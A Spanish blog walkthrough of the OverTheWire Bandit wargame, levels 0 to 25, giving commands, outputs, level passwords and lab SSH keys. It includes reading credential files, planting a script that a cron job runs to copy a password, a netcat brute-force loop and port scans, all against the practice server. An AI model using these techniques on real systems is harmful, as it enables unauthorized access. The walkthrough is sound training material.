Esta pagina se ve mejor con JavaScript habilitado

Bandit overthewire Wargame

 ·  🎃 kr0m

En este pequeño tutorial vamos a explicar como resolver los retos Bandit de OverTheWire.

0 -> 1

ssh bandit0@bandit.labs.overthewire.org
bandit0

bandit0@melinda:~$ cat readme

boJ9jbbUNNfktd78OOpsqOltutMc3MY1

1 -> 2

ssh bandit1@bandit.labs.overthewire.org
boJ9jbbUNNfktd78OOpsqOltutMc3MY1

bandit1@melinda:~$ cat ./-

CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9

2 -> 3

ssh bandit2@bandit.labs.overthewire.org -p22
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9

bandit2@melinda:~$ cat spaces\ in\ this\ filename

UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK

3 -> 4

ssh bandit3@bandit.labs.overthewire.org -p22
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK

bandit3@melinda:~$ cat inhere/.hidden

pIwrPrtPN36QITSp3EQaw936yaFoFgAB

4 -> 5

ssh bandit4@bandit.labs.overthewire.org -p22
pIwrPrtPN36QITSp3EQaw936yaFoFgAB

bandit4@melinda:$ cd inhere
bandit4@melinda:
/inhere$ cat ./-file07

koReBOKuIDDepwhWk7jZC0RTdopnAYKh

5 -> 6

ssh bandit5@bandit.labs.overthewire.org -p22
koReBOKuIDDepwhWk7jZC0RTdopnAYKh

bandit5@melinda:$ cd inhere/
bandit5@melinda:
/inhere$ find . -type f -size 1033c -name “[[:print:]]*” ! -executable

./maybehere07/.file2
bandit5@melinda:~/inhere$ cat ./maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7

6 -> 7

ssh bandit6@bandit.labs.overthewire.org -p22
DXjZPULLxYr17uwoI01bNLQbtFemEgo7

bandit6@melinda:$ find / -type f -size 33c -user bandit7 -group bandit6
bandit6@melinda:
$ cat /var/lib/dpkg/info/bandit7.password

HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs

7 -> 8

ssh bandit7@bandit.labs.overthewire.org -p22
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs

bandit7@melinda:~$ grep millionth data.txt

millionth cvX2JJa4CFALtqS87jk27qwqGhBM9plV

8 -> 9

ssh bandit8@bandit.labs.overthewire.org -p22
cvX2JJa4CFALtqS87jk27qwqGhBM9plV

bandit8@melinda:~$ cat data.txt |sort|uniq -c

 1 UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR

9 -> 10

ssh bandit9@bandit.labs.overthewire.org -p22
UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR

bandit9@melinda:~$ strings data.txt |grep ‘====’

I========== the6
========== password
========== ism
========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk

10 -> 11

ssh bandit10@bandit.labs.overthewire.org -p22
truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk

bandit10@melinda:~$ strings data.txt |base64 -d
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

11 -> 12

ssh bandit11@bandit.labs.overthewire.org -p22
IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

bandit11@melinda:$ alias rot13=“tr ‘[A-Za-z]’ ‘[N-ZA-Mn-za-m]’”
bandit11@melinda:
$ echo -e “Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh”|rot13

The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

12 -> 13

ssh bandit12@bandit.labs.overthewire.org -p22
5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

bandit12@melinda:$ mkdir /tmp/kr0m
bandit12@melinda:
$ cp data.txt /tmp/kr0m/
bandit12@melinda:/tmp/kr0m$ xxd -r data.txt foobar.bin
bandit12@melinda:/tmp/kr0m$ file foobar.bin

foobar.bin: gzip compressed data, was "data2.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/kr0m$ mv foobar.bin foobar.bin.gz
bandit12@melinda:/tmp/kr0m$ gunzip foobar.bin.gz
bandit12@melinda:/tmp/kr0m$ file foobar.bin
foobar.bin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/kr0m$ bzip2 -d foobar.bin.gz2
bzip2: Can't guess original name for foobar.bin.gz2 -- using foobar.bin.gz2.out
bandit12@melinda:/tmp/kr0m$ file foobar.bin.gz2.out
foobar.bin.gz2.out: gzip compressed data, was "data4.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/kr0m$ mv foobar.bin.gz2.out foobar.bin.gz
bandit12@melinda:/tmp/kr0m$ gunzip foobar.bin.gz
bandit12@melinda:/tmp/kr0m$ file foobar.bin
foobar.bin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/kr0m$ tar -xvf foobar.bin
data5.bin
bandit12@melinda:/tmp/kr0m$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/kr0m$ mv data5.bin data5.bin.tar
bandit12@melinda:/tmp/kr0m$ tar -xvf data5.bin.tar
data6.bin
bandit12@melinda:/tmp/kr0m$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/kr0m$ mv data6.bin data6.bin.gz2
bandit12@melinda:/tmp/kr0m$ bzip2 -d data6.bin.gz2
bzip2: Can't guess original name for data6.bin.gz2 -- using data6.bin.gz2.out
bandit12@melinda:/tmp/kr0m$ file data6.bin.gz2.out
data6.bin.gz2.out: POSIX tar archive (GNU)
bandit12@melinda:/tmp/kr0m$ mv data6.bin.gz2.out data6.bin.tar
bandit12@melinda:/tmp/kr0m$ tar -xvf data6.bin.tar
bandit12@melinda:/tmp/kr0m$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/kr0m$ mv data8.bin data8.bin.gz
bandit12@melinda:/tmp/kr0m$ gunzip data8.bin.gz
bandit12@melinda:/tmp/kr0m$ file data8.bin
data8.bin: ASCII text
bandit12@melinda:/tmp/kr0m$ cat data8.bin
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

13 -> 14

ssh bandit13@bandit.labs.overthewire.org -p22
8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

bandit13@melinda:~$ cat sshkey.private

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAxkkOE83W2cOT7IWhFc9aPaaQmQDdgzuXCv+ppZHa++buSkN+
gg0tcr7Fw8NLGa5+Uzec2rEg0WmeevB13AIoYp0MZyETq46t+jk9puNwZwIt9XgB
ZufGtZEwWbFWw/vVLNwOXBe4UWStGRWzgPpEeSv5Tb1VjLZIBdGphTIK22Amz6Zb
ThMsiMnyJafEwJ/T8PQO3myS91vUHEuoOMAzoUID4kN0MEZ3+XahyK0HJVq68KsV
ObefXG1vvA3GAJ29kxJaqvRfgYnqZryWN7w3CHjNU4c/2Jkp+n8L0SnxaNA+WYA7
jiPyTF0is8uzMlYQ4l1Lzh/8/MpvhCQF8r22dwIDAQABAoIBAQC6dWBjhyEOzjeA
J3j/RWmap9M5zfJ/wb2bfidNpwbB8rsJ4sZIDZQ7XuIh4LfygoAQSS+bBw3RXvzE
pvJt3SmU8hIDuLsCjL1VnBY5pY7Bju8g8aR/3FyjyNAqx/TLfzlLYfOu7i9Jet67
xAh0tONG/u8FB5I3LAI2Vp6OviwvdWeC4nOxCthldpuPKNLA8rmMMVRTKQ+7T2VS
nXmwYckKUcUgzoVSpiNZaS0zUDypdpy2+tRH3MQa5kqN1YKjvF8RC47woOYCktsD
o3FFpGNFec9Taa3Msy+DfQQhHKZFKIL3bJDONtmrVvtYK40/yeU4aZ/HA2DQzwhe
ol1AfiEhAoGBAOnVjosBkm7sblK+n4IEwPxs8sOmhPnTDUy5WGrpSCrXOmsVIBUf
laL3ZGLx3xCIwtCnEucB9DvN2HZkupc/h6hTKUYLqXuyLD8njTrbRhLgbC9QrKrS
M1F2fSTxVqPtZDlDMwjNR04xHA/fKh8bXXyTMqOHNJTHHNhbh3McdURjAoGBANkU
1hqfnw7+aXncJ9bjysr1ZWbqOE5Nd8AFgfwaKuGTTVX2NsUQnCMWdOp+wFak40JH
PKWkJNdBG+ex0H9JNQsTK3X5PBMAS8AfX0GrKeuwKWA6erytVTqjOfLYcdp5+z9s
8DtVCxDuVsM+i4X8UqIGOlvGbtKEVokHPFXP1q/dAoGAcHg5YX7WEehCgCYTzpO+
xysX8ScM2qS6xuZ3MqUWAxUWkh7NGZvhe0sGy9iOdANzwKw7mUUFViaCMR/t54W1
GC83sOs3D7n5Mj8x3NdO8xFit7dT9a245TvaoYQ7KgmqpSg/ScKCw4c3eiLava+J
3btnJeSIU+8ZXq9XjPRpKwUCgYA7z6LiOQKxNeXH3qHXcnHok855maUj5fJNpPbY
iDkyZ8ySF8GlcFsky8Yw6fWCqfG3zDrohJ5l9JmEsBh7SadkwsZhvecQcS9t4vby
9/8X4jS0P8ibfcKS4nBP+dT81kkkg5Z5MohXBORA7VWx+ACohcDEkprsQ+w32xeD
qT1EvQKBgQDKm8ws2ByvSUVs9GjTilCajFqLJ0eVYzRPaY6f++Gv/UVfAPV4c+S0
kAWpXbv5tbkkzbS0eaLPTKgLzavXtQoTtKwrjpolHKIHUz6Wu+n4abfAIRFubOdN
/+aLoRQ0yBDRbdXMsZN/jvY44eM+xRLdRVyMmdPtP8belRi2E2aEzA==
-----END RSA PRIVATE KEY-----
bandit13@melinda:~$ logout

14 -> 15

vi .ssh/vertex

ssh -i .ssh/vertex bandit14@bandit.labs.overthewire.org -p22
bandit14@melinda:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

ssh bandit14@bandit.labs.overthewire.org -p22
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

bandit14@melinda:~$ telnet localhost 30000

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr

Connection closed by foreign host.

15 -> 16

ssh bandit15@bandit.labs.overthewire.org -p22
BfMYroe26WYalil77FoDi9qh59eK5xNr

bandit15@melinda:~$ openssl s_client -ign_eof -connect localhost:30001

CONNECTED(00000003)
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
---
Certificate chain
 0 s:/CN=li190-250.members.linode.com
 i:/CN=li190-250.members.linode.com
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIC3jCCAcagAwIBAgIJAI5QiWZw4YHbMA0GCSqGSIb3DQEBCwUAMCcxJTAjBgNV
BAMTHGxpMTkwLTI1MC5tZW1iZXJzLmxpbm9kZS5jb20wHhcNMTQxMTE0MTAyODA0
WhcNMjQxMTExMTAyODA0WjAnMSUwIwYDVQQDExxsaTE5MC0yNTAubWVtYmVycy5s
aW5vZGUuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsKmy9o5z
WU+1EH7Z3bB5TGQA+16zXDcEJy6tZWZ8CDrRyQXiahendp45BWUc/ZuLDo0+B3Wt
ZXjofmLw/F4fmR+8X1s1fQZX2dFt920qEm7LxqzWd0c7FdHiBwwRrwhkk+3cQpOB
TTGdLWEgpdmwwNZDTUdsDLzjDczPnju6T6p6ArTECztPbmTjfY4QIRtC6capL1Z+
yPJSQVAuAMEX1wTDWTGdm0VV7oW4F5cGZutf6QAP51jdhSyZuGilIPHbnj0l6Qc7
a7+OtEsEGi31aJ8KpRf7LNZ7DXCuoB3Hf75Pd6VjDgoOIagcH0NYqa75gEjBkGzs
ktLWykT7ag7fKwIDAQABow0wCzAJBgNVHRMEAjAAMA0GCSqGSIb3DQEBCwUAA4IB
AQCaZdUNAj8WDEKWdoU3LNXUBJlTJwiWBrh550PbHSQORcCz2K0kiMei1A4ojK2N
dMHFGAqAeUEaxtz92p2BoFpZasAtdSa3u63tBckFhfUolIS1TC7Cj51y19ysTeep
fGPFpuPCVqVPsruei8Z/iqn3bFIhQQdmumeePZQdPMwZSWHNVYC5XODd7PvNDrDu
5MZJjkz4+6LbwwAvyew62meFN2QEsYbK2Brtbhze+IjE27FGWlSw4K3jlwa409MD
MTf4JU41ELaYY8G/LSNDJsBVhhkHzvXR9iCbXxNz3IL0dQDNj7h4LKhBy0q7hvqg
kDzwlmBO4WKSmCAuky44cXmd
-----END CERTIFICATE-----
subject=/CN=li190-250.members.linode.com
issuer=/CN=li190-250.members.linode.com
---
No client certificate CA names sent
---
SSL handshake has read 1714 bytes and written 637 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
 Protocol : SSLv3
 Cipher : DHE-RSA-AES256-SHA
 Session-ID: 4752AD4270FEFE9AE3B505AD5AB5AA08FF30F9EF24914ACBEB87F293DE7FCDBA
 Session-ID-ctx:
 Master-Key: 3228D00C43C71BB4171E1EF3191C3C928C7B512E53716ECBABDA1BEF9747681ED98F33233474BB1467103E928580365A
 Key-Arg : None
 PSK identity: None
 PSK identity hint: None
 SRP username: None
 Start Time: 1476341975
 Timeout : 300 (sec)
 Verify return code: 18 (self signed certificate)
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd

read:errno=0

16 -> 17

ssh bandit16@bandit.labs.overthewire.org -p22
cluFn7wTiGryunymYOu4RcffSxQluehd

bandit16@melinda:~$ nmap localhost -p 31000-32000

Starting Nmap 6.40 ( http://nmap.org ) at 2016-10-13 07:04 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0024s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
31046/tcp open  unknown
31518/tcp open  unknown
31691/tcp open  unknown
31790/tcp open  unknown
31960/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
bandit16@melinda:~$ openssl s_client -ign_eof -connect localhost:31790
CONNECTED(00000003)
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
---
Certificate chain
 0 s:/CN=li190-250.members.linode.com
 i:/CN=li190-250.members.linode.com
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIC3jCCAcagAwIBAgIJAI5QiWZw4YHbMA0GCSqGSIb3DQEBCwUAMCcxJTAjBgNV
BAMTHGxpMTkwLTI1MC5tZW1iZXJzLmxpbm9kZS5jb20wHhcNMTQxMTE0MTAyODA0
WhcNMjQxMTExMTAyODA0WjAnMSUwIwYDVQQDExxsaTE5MC0yNTAubWVtYmVycy5s
aW5vZGUuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsKmy9o5z
WU+1EH7Z3bB5TGQA+16zXDcEJy6tZWZ8CDrRyQXiahendp45BWUc/ZuLDo0+B3Wt
ZXjofmLw/F4fmR+8X1s1fQZX2dFt920qEm7LxqzWd0c7FdHiBwwRrwhkk+3cQpOB
TTGdLWEgpdmwwNZDTUdsDLzjDczPnju6T6p6ArTECztPbmTjfY4QIRtC6capL1Z+
yPJSQVAuAMEX1wTDWTGdm0VV7oW4F5cGZutf6QAP51jdhSyZuGilIPHbnj0l6Qc7
a7+OtEsEGi31aJ8KpRf7LNZ7DXCuoB3Hf75Pd6VjDgoOIagcH0NYqa75gEjBkGzs
ktLWykT7ag7fKwIDAQABow0wCzAJBgNVHRMEAjAAMA0GCSqGSIb3DQEBCwUAA4IB
AQCaZdUNAj8WDEKWdoU3LNXUBJlTJwiWBrh550PbHSQORcCz2K0kiMei1A4ojK2N
dMHFGAqAeUEaxtz92p2BoFpZasAtdSa3u63tBckFhfUolIS1TC7Cj51y19ysTeep
fGPFpuPCVqVPsruei8Z/iqn3bFIhQQdmumeePZQdPMwZSWHNVYC5XODd7PvNDrDu
5MZJjkz4+6LbwwAvyew62meFN2QEsYbK2Brtbhze+IjE27FGWlSw4K3jlwa409MD
MTf4JU41ELaYY8G/LSNDJsBVhhkHzvXR9iCbXxNz3IL0dQDNj7h4LKhBy0q7hvqg
kDzwlmBO4WKSmCAuky44cXmd
-----END CERTIFICATE-----
subject=/CN=li190-250.members.linode.com
issuer=/CN=li190-250.members.linode.com
---
No client certificate CA names sent
---
SSL handshake has read 1714 bytes and written 637 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
 Protocol : SSLv3
 Cipher : DHE-RSA-AES256-SHA
 Session-ID: DA74667E06E24EA181951E7F117010B61980075AC16E164A69223182E9698C6E
 Session-ID-ctx:
 Master-Key: 05534180311AFEDCDFCD20FF5D42CB714DD8974EAABD83480BB9AE533E9778F783ED0E864D704B8996E35E118181D77C
 Key-Arg : None
 PSK identity: None
 PSK identity hint: None
 SRP username: None
 Start Time: 1476342385
 Timeout : 300 (sec)
 Verify return code: 18 (self signed certificate)
---
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----

read:errno=0

17 -> 18

vi .ssh/vertex

ssh bandit17@bandit.labs.overthewire.org -p22
bandit17@melinda:~$ diff passwords.new passwords.old

42c42
< kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
---
> BS8bqB1kqkinKJjuxL6k072Qq9NRwQpR
ssh bandit18@bandit.labs.overthewire.org -p22
kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
Byebye !

18 -> 19

ssh -t bandit18@bandit.labs.overthewire.org -p22 /bin/sh
kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd

$ cat readme

IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

19 -> 20

ssh bandit19@bandit.labs.overthewire.org -p22
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

bandit19@melinda:~$ ./bandit20-do cat /etc/bandit_pass/bandit20

GbKksEFF4yrVs6il55v6gwY5aVje5f0j

20 -> 21

ssh bandit20@bandit.labs.overthewire.org -p22
GbKksEFF4yrVs6il55v6gwY5aVje5f0j

bandit20@melinda:$ nc -l -p 7777
bandit20@melinda:
$ ./suconnect 7777
bandit20@melinda:~$ nc -l -p 7777

GbKksEFF4yrVs6il55v6gwY5aVje5f0j
bandit20@melinda:~$ ./suconnect 7777
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
bandit20@melinda:~$ nc -l -p 7777
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

21 -> 22

ssh bandit21@bandit.labs.overthewire.org -p22
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

bandit21@melinda:~$ ls -la /usr/bin/cronjob_bandit*

-rwxr-x--- 1 bandit22 bandit21 130 Nov 14 2014 /usr/bin/cronjob_bandit22.sh
-rwxr-x--- 1 bandit23 bandit22 211 Nov 14 2014 /usr/bin/cronjob_bandit23.sh
-rwxr-x--- 1 bandit24 bandit23 257 May 3 2015 /usr/bin/cronjob_bandit24.sh
-rwx------ 1 root root 186 May 3 2015 /usr/bin/cronjob_bandit24_root.sh
bandit21@melinda:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@melinda:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

22 -> 23

ssh bandit22@bandit.labs.overthewire.org -p22
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

bandit22@melinda:~$ ls -la /usr/bin/cronjob_bandit*

-rwxr-x--- 1 bandit22 bandit21 130 Nov 14 2014 /usr/bin/cronjob_bandit22.sh
-rwxr-x--- 1 bandit23 bandit22 211 Nov 14 2014 /usr/bin/cronjob_bandit23.sh
-rwxr-x--- 1 bandit24 bandit23 257 May 3 2015 /usr/bin/cronjob_bandit24.sh
-rwx------ 1 root root 186 May 3 2015 /usr/bin/cronjob_bandit24_root.sh
bandit22@melinda:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@melinda:~$ echo I am user bandit23 | md5sum | cut -d ’ ’ -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@melinda:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

23 -> 24

ssh bandit23@bandit.labs.overthewire.org -p22
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

bandit23@melinda:~$ ls -la /usr/bin/cronjob_bandit*

-rwxr-x--- 1 bandit22 bandit21 130 Nov 14 2014 /usr/bin/cronjob_bandit22.sh
-rwxr-x--- 1 bandit23 bandit22 211 Nov 14 2014 /usr/bin/cronjob_bandit23.sh
-rwxr-x--- 1 bandit24 bandit23 257 May 3 2015 /usr/bin/cronjob_bandit24.sh
-rwx------ 1 root root 186 May 3 2015 /usr/bin/cronjob_bandit24_root.sh
bandit23@melinda:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
    echo "Handling $i"
    timeout -s 9 60 "./$i"
    rm -f "./$i"
    fi
done
bandit23@melinda:~$ ls -la /var/spool/
total 169
drwxr-xr-x 6 root root 4096 May 3 2015 .
drwxr-xr-x 15 root root 4096 Nov 14 2014 ..
drwxrwxrwx 2 bandit24 bandit23 151552 Oct 13 08:32 bandit24
drwxr-xr-x 5 root root 4096 Apr 20 2014 cron
lrwxrwxrwx 1 root root 7 Apr 20 2014 mail -> ../mail
drwxr-xr-x 2 root root 4096 Apr 11 2014 plymouth
drwx------ 2 syslog adm 4096 Dec 4 2013 rsyslog
bandit23@melinda:~$ vi /var/spool/bandit24/kr0m.sh
#! /bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bandit24pass
chown bandit23:bandit23 /tmp/bandit24pass

chmod 777 /var/spool/bandit24/kr0m.sh

Esperamos
watch ‘cat /tmp/bandit24pass’

bandit23@melinda:~$ cat /tmp/bandit24pass

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

24 -> 25

ssh bandit24@bandit.labs.overthewire.org -p22
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Para ir mas rápido abrimos 8 consolas:

bandit24@melinda:$ for i in $(seq -w 0 1250); do echo I: $i && echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i | nc localhost 30002 |grep -v ‘separated by a space’ | grep -v ‘Try again’; done
bandit24@melinda:
$ for i in $(seq -w 1251 2500); do echo I: $i && echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i | nc localhost 30002 |grep -v ‘separated by a space’ | grep -v ‘Try again’; done
bandit24@melinda:$ for i in $(seq -w 2501 3750); do echo I: $i && echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i | nc localhost 30002 |grep -v ‘separated by a space’ | grep -v ‘Try again’; done
bandit24@melinda:
$ for i in $(seq -w 3751 5000); do echo I: $i && echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i | nc localhost 30002 |grep -v ‘separated by a space’ | grep -v ‘Try again’; done
bandit24@melinda:$ for i in $(seq -w 5001 6250); do echo I: $i && echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i | nc localhost 30002 |grep -v ‘separated by a space’ | grep -v ‘Try again’; done
bandit24@melinda:
$ for i in $(seq -w 6251 7500); do echo I: $i && echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i | nc localhost 30002 |grep -v ‘separated by a space’ | grep -v ‘Try again’; done
bandit24@melinda:$ for i in $(seq -w 7501 8750); do echo I: $i && echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i | nc localhost 30002 |grep -v ‘separated by a space’ | grep -v ‘Try again’; done
bandit24@melinda:
$ for i in $(seq -w 8751 9999); do echo I: $i && echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i | nc localhost 30002 |grep -v ‘separated by a space’ | grep -v ‘Try again’; done

I: 5669
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

25 -> 26

ssh bandit25@bandit.labs.overthewire.org -p22
uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

bandit25@melinda:~$ grep bandit26 /etc/passwd

bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@melinda:~$ cat /usr/bin/showtext
#!/bin/sh
more ~/text.txt
exit 0
bandit25@melinda:~$ cat /home/bandit26/text.txt
cat: /home/bandit26/text.txt: Permission denied
bandit25@melinda:~$ ls -la /home/bandit26/text.txt
-rw-r----- 1 bandit26 bandit26 258 Nov 16 2014 /home/bandit26/text.txt
bandit25@melinda:~$ ls -la /usr/bin/showtext
-rwxr-xr-x 1 root root 34 Nov 16 2014 /usr/bin/showtext
bandit25@melinda:~$ ls -la /home/bandit26/text.txt
-rw-r----- 1 bandit26 bandit26 258 Nov 16 2014 /home/bandit26/text.txt
bandit25@melinda:~$ cat bandit26.sshkey
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEApis2AuoooEqeYWamtwX2k5z9uU1Afl2F8VyXQqbv/LTrIwdW
pTfaeRHXzr0Y0a5Oe3GB/+W2+PReif+bPZlzTY1XFwpk+DiHk1kmL0moEW8HJuT9
/5XbnpjSzn0eEAfFax2OcopjrzVqdBJQerkj0puv3UXY07AskgkyD5XepwGAlJOG
xZsMq1oZqQ0W29aBtfykuGie2bxroRjuAPrYM4o3MMmtlNE5fC4G9Ihq0eq73MDi
1ze6d2jIGce873qxn308BA2qhRPJNEbnPev5gI+5tU+UxebW8KLbk0EhoXB953Ix
3lgOIrT9Y6skRjsMSFmC6WN/O7ovu8QzGqxdywIDAQABAoIBAAaXoETtVT9GtpHW
qLaKHgYtLEO1tOFOhInWyolyZgL4inuRRva3CIvVEWK6TcnDyIlNL4MfcerehwGi
